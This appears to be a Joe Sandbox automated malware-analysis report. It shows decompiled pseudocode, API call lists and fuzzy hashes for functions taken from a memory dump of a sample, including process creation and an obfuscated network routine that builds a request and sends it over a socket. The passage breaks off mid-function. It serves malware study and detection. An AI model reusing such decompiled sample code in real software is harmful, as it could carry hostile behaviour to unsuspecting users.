Uniqueness

Uniqueness Score: -1.00%

Function 00386260 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00386260(long long __fp0, CHAR* _a4, CHAR* _a8) {
				intOrPtr _v8;
				long long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v96;
				int _t24;
				intOrPtr _t28;

				 *0x3ce018 = ( *0x3ce018 & 0x0000ffff) - 0x696ad4c0;
				_t28 =  *0x3ce38c; // 0x93fc1fee
				_v8 = _t28 - 0x3d50a8bd;
				asm("fild dword [ebp-0x4]");
				_v12 = __fp0;
				_v28.hProcess = 0;
				_v28.hThread = 0;
				_v28.dwProcessId = 0;
				_v28.dwThreadId = 0;
				 *0x3ce468 =  *0x3ce468 + _v12;
				E0039C990( &_v96, 0, 0x44);
				_v96.wShowWindow = 1;
				_v96.cb = 0x44;
				_v96.dwFlags = 1;
				_t24 = CreateProcessA(_a4, _a8, 0, 0, 0, 8, 0, 0,  &_v96,  &_v28); // executed
				if(_t24 != 0) {
					CloseHandle(_v28.hThread);
					return CloseHandle(_v28);
				}
				return _t24;
			}

0x00386272
0x00386278
0x00386284
0x0038628b
0x00386293
0x0038629c
0x003862a2
0x003862a5
0x003862a8
0x003862ab
0x003862b1
0x003862d3
0x003862de
0x003862e5
0x003862ec
0x003862f4
0x003862fa
0x00000000
0x00386304
0x0038630d

APIs

_memset.LIBCMT ref: 003862B1
CreateProcessA.KERNELBASE(?,00000008,00000000,00000000,00000000,00000008,00000000,00000000,?,0000159F), ref: 003862EC
CloseHandle.KERNEL32(0000001F), ref: 003862FA
CloseHandle.KERNEL32(0000159F), ref: 00386304

Strings

D, xrefs: 003862DE

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: CloseHandle$CreateProcess_memset
String ID: D
API String ID: 3113380336-2746444292
Opcode ID: 67faba9ebc8c10c63f6d3abd1b49eb073ab2e4b8cab9ab834984142136b2a4e3
Instruction ID: 1f381e7e22e635c73e4d5a7040fcc9a2b97bdbd3bd0ed49e9e79f75ac32e2d55
Opcode Fuzzy Hash: 67faba9ebc8c10c63f6d3abd1b49eb073ab2e4b8cab9ab834984142136b2a4e3
Instruction Fuzzy Hash: 97112E75900308AFDB05DFE5EC45BAE7B78FB08700F108119E608EB294D7746A45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0039D76C Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0039D76C(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v16;
				char _v20;
				void* _t12;
				signed int _t13;
				int _t16;
				intOrPtr* _t17;
				intOrPtr _t19;
				void* _t29;
				void* _t30;
				void* _t32;
				void* _t36;
				void* _t38;
				void* _t40;

				_t32 = __esi;
				_t30 = __edi;
				_t29 = __edx;
				while(1) {
					_t12 = E0039CBC4(_t29, _t30, _t32, _a4); // executed
					if(_t12 != 0) {
						break;
					}
					_t13 = E0039FDDD(_t12, _a4);
					__eflags = _t13;
					if(_t13 == 0) {
						__eflags =  *0x3d0994 & 0x00000001;
						if(( *0x3d0994 & 0x00000001) == 0) {
							 *0x3d0994 =  *0x3d0994 | 0x00000001;
							__eflags =  *0x3d0994;
							_push(1);
							_v8 = "bad allocation";
							E0039E404(0x3d0988,  &_v8);
							 *0x3d0988 = 0x3c8644;
							E003A63E5( *0x3d0994, 0x3c2c49);
						}
						E0039E594( &_v20, 0x3d0988);
						_v20 = 0x3c8644;
						_t16 = E0039E685( &_v20, 0x3cba54);
						asm("int3");
						_t38 = _t36;
						_t40 = _t38;
						_push(_t40);
						__eflags = _v16;
						if(_v16 != 0) {
							_t16 = HeapFree( *0x3d09e0, 0, _v8);
							__eflags = _t16;
							if(__eflags == 0) {
								_push(0x3c8644);
								_t17 = E0039FA66(__eflags);
								_t19 = E0039FA24(GetLastError());
								 *_t17 = _t19;
								return _t19;
							}
						}
						return _t16;
					} else {
						continue;
					}
					L13:
				}
				return _t12;
				goto L13;
			}

0x0039d76c
0x0039d76c
0x0039d76c
0x0039d783
0x0039d786
0x0039d78e
0x00000000
0x00000000
0x0039d779
0x0039d77f
0x0039d781
0x0039d792
0x0039d7a3
0x0039d7a5
0x0039d7a5
0x0039d7ac
0x0039d7b4
0x0039d7bb
0x0039d7c5
0x0039d7cb
0x0039d7d0
0x0039d7d5
0x0039d7e3
0x0039d7e6
0x0039d7eb
0x0039d7f1
0x0039c1f9
0x0039cb4d
0x0039cb50
0x0039cb54
0x0039cb61
0x0039cb67
0x0039cb69
0x0039cb6b
0x0039cb6c
0x0039cb7a
0x0039cb80
0x00000000
0x0039cb82
0x0039cb69
0x0039cb84
0x00000000
0x00000000
0x00000000
0x00000000
0x0039d781
0x0039d791
0x00000000

APIs

_malloc.LIBCMT ref: 0039D786

Part of subcall function 0039CBC4: __FF_MSGBANNER.LIBCMT ref: 0039CBDD
Part of subcall function 0039CBC4: __NMSG_WRITE.LIBCMT ref: 0039CBE4
Part of subcall function 0039CBC4: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003B1B2D,00000000,00000001,00000000,?,003A2770,00000018,003CBCE0,0000000C,003A2800), ref: 0039CC09

std::exception::exception.LIBCMT ref: 0039D7BB
std::exception::exception.LIBCMT ref: 0039D7D5
__CxxThrowException@8.LIBCMT ref: 0039D7E6

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: 41bc1855639a2a219a0254bed2752650abf22ed8bf76dc566909c6b9361c020f
Instruction ID: ed3857d2e5c57d90650f53ab8f1cee6aa202a7eff97a6dda8ed8da17558548e1
Opcode Fuzzy Hash: 41bc1855639a2a219a0254bed2752650abf22ed8bf76dc566909c6b9361c020f
Instruction Fuzzy Hash: 61F0C876501205AADF4BEF94EC53FAE7BB99B40718F15001AF414DA1E2DB718F058791

Uniqueness

Uniqueness Score: -1.00%

Function 0039DF62 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0039DF62(char _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_t1 =  &_a4; // 0x383d2c, executed
				_push( *_t1);
				_t2 = E0039DE22(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}

0x0039df67
0x0039df69
0x0039df6b
0x0039df6b
0x0039df6e
0x0039df77

APIs

_doexit.LIBCMT ref: 0039DF6E

Part of subcall function 0039DE22: __lock.LIBCMT ref: 0039DE30
Part of subcall function 0039DE22: RtlDecodePointer.NTDLL(003CBAD0,00000020,0039DF89,00000000,00000001,00000000,?,0039DFC9,000000FF,?,003A280C,00000011,00000000,?,0039FF0F,0000000D), ref: 0039DE6C
Part of subcall function 0039DE22: DecodePointer.KERNEL32(?,0039DFC9,000000FF,?,003A280C,00000011,00000000,?,0039FF0F,0000000D), ref: 0039DE7D
Part of subcall function 0039DE22: DecodePointer.KERNEL32(-00000004,?,0039DFC9,000000FF,?,003A280C,00000011,00000000,?,0039FF0F,0000000D), ref: 0039DEA3
Part of subcall function 0039DE22: DecodePointer.KERNEL32(?,0039DFC9,000000FF,?,003A280C,00000011,00000000,?,0039FF0F,0000000D), ref: 0039DEB6
Part of subcall function 0039DE22: DecodePointer.KERNEL32(?,0039DFC9,000000FF,?,003A280C,00000011,00000000,?,0039FF0F,0000000D), ref: 0039DEC0

Strings

,=8, xrefs: 0039DF6B

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: DecodePointer$__lock_doexit
String ID: ,=8
API String ID: 3343572566-2365363894
Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction ID: e49acbf24fbce51b8109eca5e70046331e0df39750cc2c60fa192d522a380de0
Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
Instruction Fuzzy Hash: A1B0923298030833DA212942AC03F163A0987E0B60E240020BA0C1D1A1A9A2AA618189

Uniqueness

Uniqueness Score: -1.00%

Function 0039DC8D Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0039DC8D(int _a4) {

				E0039DC62(_a4);
				ExitProcess(_a4);
			}

0x0039dc95
0x0039dc9e

APIs

___crtCorExitProcess.LIBCMT ref: 0039DC95

Part of subcall function 0039DC62: GetModuleHandleW.KERNEL32(mscoree.dll,?,0039DC9A,00000000,?,0039CBF3,000000FF,0000001E,00000001,00000000,00000000,?,003B1B2D,00000000,00000001,00000000), ref: 0039DC6C
Part of subcall function 0039DC62: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0039DC7C

ExitProcess.KERNEL32 ref: 0039DC9E

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 81b9998a1738d8df82ee1b83a97ef6ab2c4a7e3013c5465c27492e540cb7c7a6
Instruction ID: 655f406ba13fa814a5c5c9bf261fc3780f075cc6672ff8216b1461b68dd51e5a
Opcode Fuzzy Hash: 81b9998a1738d8df82ee1b83a97ef6ab2c4a7e3013c5465c27492e540cb7c7a6
Instruction Fuzzy Hash: 1AB09231000208BFCF023F16DC0EC497F2AEB817A0B54C020F9494A031DFB2EE92DA80

Uniqueness

Uniqueness Score: -1.00%

Function 003BC120 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E003BC120(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x3d09e0, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x3d1014;
					if( *0x3d1014 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E0039FDDD(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E0039FA66(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x003bc125
0x003bc12a
0x003bc147
0x003bc14c
0x003bc14e
0x003bc150
0x003bc152
0x003bc152
0x003bc152
0x00000000
0x003bc15a
0x003bc163
0x003bc169
0x003bc16b
0x00000000
0x00000000
0x003bc19f
0x003bc1a1
0x00000000
0x003bc16d
0x003bc16d
0x003bc174
0x003bc192
0x003bc195
0x003bc197
0x003bc199
0x003bc199
0x003bc176
0x003bc177
0x003bc17d
0x003bc17f
0x003bc153
0x003bc153
0x003bc155
0x003bc158
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc181
0x003bc181
0x003bc184
0x003bc186
0x003bc188
0x003bc188
0x003bc18e
0x003bc18e
0x003bc17f
0x00000000
0x003bc12c
0x003bc130
0x003bc133
0x003bc136
0x00000000
0x003bc138
0x003bc13d
0x003bc146
0x003bc146
0x003bc136
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,003B1B77,00000000,00000000,00000000,00000000,00000000,?,0039FFA4,00000001,00000214,?,00399D4C), ref: 003BC163

Part of subcall function 0039FA66: __getptd_noexit.LIBCMT ref: 0039FA66

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 5cfd7d2deaa37d7e7c20a34b6256509d02b1dec723b0ef952f4e073ebfeb82ae
Instruction ID: 09d64ad2059e2c4be55e9010acd23e59a651564a56d96f554ea30102c0628e8c
Opcode Fuzzy Hash: 5cfd7d2deaa37d7e7c20a34b6256509d02b1dec723b0ef952f4e073ebfeb82ae
Instruction Fuzzy Hash: 0601B9313212115FEB379F29DC04BEA3359AF80764F065529E915DB992D7749C40C690

Uniqueness

Uniqueness Score: -1.00%

Function 0039FE05 Relevance: 1.5, APIs: 1, Instructions: 3
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000,003B178D,003D09E8,00000314,00000000,?,?,?,?,?,0039FCD6,003D09E8,Microsoft Visual C++ Runtime Library,00012010), ref: 0039FE07

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 7857d354119990083e560110bd2e8a4b103b7d763a935cdaf3c355a9c99335a4
Instruction ID: bfd0d1fe2b86b6bb6152e73980e7447cded95d1f6b609806a4fd803c21b113a8
Opcode Fuzzy Hash: 7857d354119990083e560110bd2e8a4b103b7d763a935cdaf3c355a9c99335a4
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 003883D6 Relevance: 1.5, APIs: 1, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63df17fb50574583c9509862bf6ed4c5659e0a8720b9c7404b8392bb64a962c
Instruction ID: 653f5efc5affee82f72f58110940d213f259343b7037b05354f54da32d403129
Opcode Fuzzy Hash: b63df17fb50574583c9509862bf6ed4c5659e0a8720b9c7404b8392bb64a962c
Instruction Fuzzy Hash: 04C1AF70801619CBD70ADF52FD889A87B7CFB88315F56449AD481E32B4EB3876B1DB42

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003992C0 Relevance: 23.4, APIs: 12, Strings: 1, Instructions: 635
networkCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E003992C0(intOrPtr __edx, void* __esi, long long __fp0, intOrPtr* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long long _v24;
				intOrPtr _v28;
				long long _v32;
				char _v60;
				long long _v68;
				intOrPtr _v80;
				short _v82;
				char _v84;
				char _v212;
				char _v724;
				char _v1748;
				void* __edi;
				signed int _t112;
				void* _t116;
				intOrPtr _t118;
				void* _t119;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				unsigned int _t123;
				void* _t128;
				signed int _t140;
				short _t146;
				void* _t147;
				void* _t151;
				signed int _t153;
				signed int _t154;
				intOrPtr _t155;
				signed int _t156;
				signed int _t161;
				signed int _t165;
				signed int _t168;
				void* _t169;
				signed int _t170;
				signed char _t175;
				void* _t184;
				signed char _t190;
				void* _t194;
				signed char _t195;
				short _t197;
				signed int _t212;
				signed int _t213;
				signed int _t216;
				intOrPtr* _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;
				signed int _t224;
				signed int _t225;
				signed int _t227;
				intOrPtr _t232;
				intOrPtr _t241;
				char* _t244;
				signed int _t252;
				signed short _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t276;
				signed int _t278;
				intOrPtr _t281;
				intOrPtr _t288;
				void* _t289;
				void* _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t300;
				intOrPtr _t302;
				signed int _t303;
				intOrPtr _t308;
				intOrPtr _t309;
				signed int _t310;
				char _t315;
				intOrPtr* _t318;
				void* _t319;
				void* _t321;
				void* _t338;
				void* _t339;
				intOrPtr _t341;
				signed int _t346;
				void* _t347;
				void* _t348;
				void* _t352;
				void* _t354;
				void* _t356;
				void* _t357;
				void* _t361;
				signed int _t370;
				signed int _t374;
				signed int _t383;
				long long _t384;
				long long _t395;
				signed int _t410;

				_t288 = __edx;
				_t112 =  *0x3ce0ec; // 0x2a1f8050
				_v20 = _t112;
				asm("fild dword [ebp-0x10]");
				_v32 = __fp0;
				asm("fsubr qword [ebp-0x1c]");
				 *0x3ce0ec = E0039CABC();
				_t370 =  *0x3ce3bc;
				asm("fld1");
				asm("faddp st1, st0");
				 *0x3ce3bc = _t370;
				E00389630( &_v60);
				_t116 = E0039B950(0);
				_t318 = _a4;
				asm("adc edx, 0x0");
				_t218 = _t318;
				_v28 = _t288;
				_v32 = _t116 + 0x258;
				_v724 = 0;
				_t8 = _t218 + 1; // 0x1447
				_t289 = _t8;
				do {
					_t118 =  *_t218;
					_t218 = _t218 + 1;
				} while (_t118 != 0);
				_t219 = _t218 - _t289;
				if(_t219 <= 0x7f) {
					_t119 = 0;
					_push(__esi);
					__eflags = _t219;
					if(_t219 >= 0) {
						_t346 = _t318 -  &_v212;
						__eflags = _t346;
						while(1) {
							_t315 =  *((intOrPtr*)(_t347 + _t346 + _t119 - 0xd0));
							 *((char*)(_t347 + _t119 - 0xd0)) = _t315;
							__eflags = _t315 - 0x2f;
							if(_t315 == 0x2f) {
								 *((char*)(_t347 + _t119 - 0xd0)) = 0;
								__eflags = _t119 - _t219;
								if(_t119 <= _t219) {
									__eflags = _t219 - _t119 + 1;
									E0039C200( &_v724, _t119 + _t318, _t219 - _t119 + 1);
									_t348 = _t348 + 0xc;
								}
								goto L11;
							}
							_t119 = _t119 + 1;
							__eflags = _t119 - _t219;
							if(_t119 <= _t219) {
								continue;
							} else {
							}
							goto L11;
						}
					}
					L11:
					_t120 =  &_v724;
					_t21 = _t120 + 1; // 0x1
					_t290 = _t21;
					do {
						_t220 =  *_t120;
						_t120 = _t120 + 1;
						__eflags = _t220;
					} while (_t220 != 0);
					_t319 = _a8;
					_t221 = _t319;
					_t121 = _t120 - _t290;
					__eflags = _t121;
					_t23 = _t221 + 1; // 0x3aa7
					_t338 = _t23;
					do {
						_t291 =  *_t221;
						_t221 = _t221 + 1;
						__eflags = _t291;
					} while (_t291 != 0);
					__eflags = _t221 - _t338 + _t121 - 0x1ff;
					if(_t221 - _t338 + _t121 <= 0x1ff) {
						_t122 = _t319;
						_t339 = _t319;
						do {
							_t224 =  *_t122;
							_t122 = _t122 + 1;
							__eflags = _t224;
						} while (_t224 != 0);
						_t123 = _t122 - _t339;
						_t321 =  &_v724 - 1;
						__eflags = _t321;
						do {
							_t225 =  *(_t321 + 1);
							_t321 = _t321 + 1;
							__eflags = _t225;
						} while (__eflags != 0);
						_t227 = _t123 >> 2;
						memcpy(_t339 + _t227 + _t227, _t339, memcpy(_t321, _t339, _t227 << 2) & 0x00000003);
						_t232 =  *0x3ce330; // 0xd6366c82
						_v8 = 0;
						 *0x3ce5a4 = _t232 +  *0x3ce5a4;
						E00398260( &_v60, _t370, E0038CF90(__eflags, _t370, 0x18, 5));
						_t128 = E00396570(5, _t126);
						_t341 = _a12;
						_t352 = _t348 + 0x28;
						__eflags = E0038CEE0(_t128);
						if(__eflags != 0) {
							 *0x3ce1a0 =  *0x3ce1a0 + 1;
							_t308 =  *0x3ce154; // 0x94dc
							_t309 =  *0x3ce1a0; // 0x691fe8ac
							_t278 =  *0x3ce12c; // 0xd1b0ed04
							 *0x3ce12c = _t278 * (0xff487d84 - _t308 - _t309);
							_t194 = E0038CF90(__eflags, _t370, 0xf03, 0xc);
							_t361 = _t352 + 8;
							_t333 = _t194;
							_t195 = E0038E5A0(_t194, 0);
							_t310 =  *0x3ce58c; // 0x7fffffff
							_v20 = _t310;
							asm("fild dword [ebp-0x10]");
							_t216 = _t195;
							_v16 = _t370;
							asm("fcompp");
							asm("fnstsw ax");
							asm("fld1");
							asm("faddp st1, st0");
							asm("fld1");
							_t410 =  *0x3ce2c8 - st0;
							asm("fxch st0, st1");
							 *0x3ce2c8 = _t410;
							__eflags = _t195 & 0x00000005;
							if((_t195 & 0x00000005) != 0) {
								st0 = _t410;
							} else {
								asm("fsubr qword [0x3c8040]");
								_t410 =  *0x3ce3d8 -  *0x3c8038;
								asm("fsubp st1, st0");
								 *0x3ce510 = _t410;
								asm("fsubr qword [0x3ce3d8]");
								 *0x3ce3d8 = _t410;
							}
							E00396570(0xc, _t333);
							_t197 =  *0x3ce33c; // 0xc71f
							_t281 =  *0x3ce46c; // 0xd500
							_v20 = _t281 - _t197;
							_t352 = _t361 + 8;
							asm("fild dword [ebp-0x10]");
							_v16 = _t410;
							_t412 =  *0x3ce030 * _v16;
							 *0x3ce030 =  *0x3ce030 * _v16;
							 *0x3ce33c =  *0x3ce33c - 1;
							__eflags = _t216;
							if(_t216 == 0) {
								_v8 = 1;
								E00396C10(_t341, _t216, 0xb);
								E00398260( &_v60, _t412, E0038CF90(__eflags, _t412, 0x3fb9, 6));
								E00396570(6, _t200);
								_t352 = _t352 + 0x10;
							}
						}
						_v24 =  *0x3ce488;
						_v16 =  *0x3ce198 +  *0x3c8030;
						_t374 =  *0x3ce4d8;
						asm("fsubr qword [ebp-0xc]");
						asm("fsubr qword [ebp-0x14]");
						 *0x3ce488 = _t374;
						E00384780( &_v60,  &_v724);
						E00384780( &_v60, E0038CF90(__eflags, _t374, 0x346, 0x32));
						E00396570(0x32, _t132);
						_t354 = _t352 + 0x10;
						E00384780( &_v60,  &_v212);
						__eflags = _v8;
						if(__eflags != 0) {
							 *0x3ce500 =  *0x3ce500 -  *0x3ce184;
							E00384780( &_v60, E0038CF90(__eflags,  *0x3ce500 -  *0x3ce184, 0x22d5, 0x44));
							_t184 = E0038CF90(__eflags,  *0x3ce500 -  *0x3ce184, 0x2ad5, 3);
							E0039E0C2( &_v1748, 0x400, _t184, E0038CEE0(E00396570(0x44, _t182)));
							E00396570(3, _t184);
							_t354 = _t354 + 0x30;
							_t190 = E00384780( &_v60,  &_v1748);
							asm("fcompp");
							asm("fnstsw ax");
							_t374 =  *0x3ce1e0;
							asm("fld1");
							asm("faddp st1, st0");
							 *0x3ce1e0 = _t374;
							__eflags = _t190 & 0x00000005;
							if(__eflags == 0) {
								_t276 = ( *0x3ce598 & 0x0000ffff) + 0x6230cc2;
								__eflags = _t276;
								 *0x3ce598 = _t276;
							}
						}
						E00384780( &_v60, E0038CF90(__eflags, _t374, 0x31be, 5));
						E00396570(5, _t136);
						_t356 = _t354 + 0x10;
						__eflags = _v8;
						if(_v8 != 0) {
							E0039B1F0( &_v60, _t374, _t341);
						}
						_t328 =  *0x3d0434(2, 1, 6);
						_v20 = _t328;
						__eflags = _t328 - 0xffffffff;
						if(_t328 != 0xffffffff) {
							__eflags = _a16;
							if(_a16 != 0) {
								 *0x3d0470(_t328, 0xffff, 0x1006,  &_a16, 4);
								_t268 =  *0x3ce2dc; // 0x14e81cf5
								_t269 = _t268 * 0x693b52e7;
								__eflags = _t269;
								 *0x3ce2dc = _t269;
							}
							_t140 =  *0x3cfb08( &_v212);
							_t241 =  *0x3ce558; // 0xa8f7
							_t293 =  *0x3ce1fc; // 0x80000000
							_v8 = 0xbcc43105 - _t293;
							 *0x3ce558 =  *0x3ce558 + 1;
							__eflags = _v8 - _t241 + 0x30722749;
							if(_v8 <= _t241 + 0x30722749) {
								_t267 =  *0x3ce580; // 0xffff
								_v8 = _t267;
								asm("fild dword [ebp-0x4]");
								asm("fsubp st1, st0");
								_v16 =  *0x3ce300 +  *0x3c8020;
								_t374 =  *0x3ce2a8 + _v16;
								 *0x3ce2a8 = _t374;
							}
							__eflags = _t140;
							if(_t140 == 0) {
								L61:
								_t244 =  &_v60;
							} else {
								_v84 = 2;
								_v80 =  *0x3cfb0c( *0x3d029c( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xc))))))));
								 *0x3ce230 =  *0x3ce230 + 1;
								_t295 =  *0x3ce230; // 0xeabf
								_v8 = _t295;
								asm("fild dword [ebp-0x4]");
								_v16 = _t374;
								asm("fsubr qword [ebp-0xc]");
								_v16 =  *0x3ce4e0;
								 *0x3ce488 =  *0x3ce488 * _v16;
								_t146 =  *0x3d046c(0x50);
								_v82 = _t146;
								_t147 =  *0x3d0440(_t328,  &_v84, 0x10);
								_t244 =  &_v60;
								__eflags = _t147 - 0xffffffff;
								if(_t147 != 0xffffffff) {
									_t212 =  *0x3d0490(_t328, E00391FC0(_t148,  &_v60), E0038CEE0(_t147), 0);
									_t151 = E0038CEE0(_t150);
									__eflags = _t212 - _t151;
									if(_t212 >= _t151) {
										_t296 =  *0x3ce2b0; // 0xef43cad8
										_v8 = _t296;
										_v16 =  *0x3ce110 +  *0x3ce4a0 +  *0x3c8018;
										asm("fild dword [ebp-0x4]");
										 *0x3ce2b0 = E0039CABC();
										_t383 =  *0x3ce4a0 +  *0x3c75c8;
										 *0x3ce4a0 = _t383;
										_t153 = E0038CB90(_t341, __eflags);
										_t213 = _t212 | 0xffffffff;
										_t154 = _t153 | _t213;
										 *0x3ce29c =  *0x3ce29c + _t154;
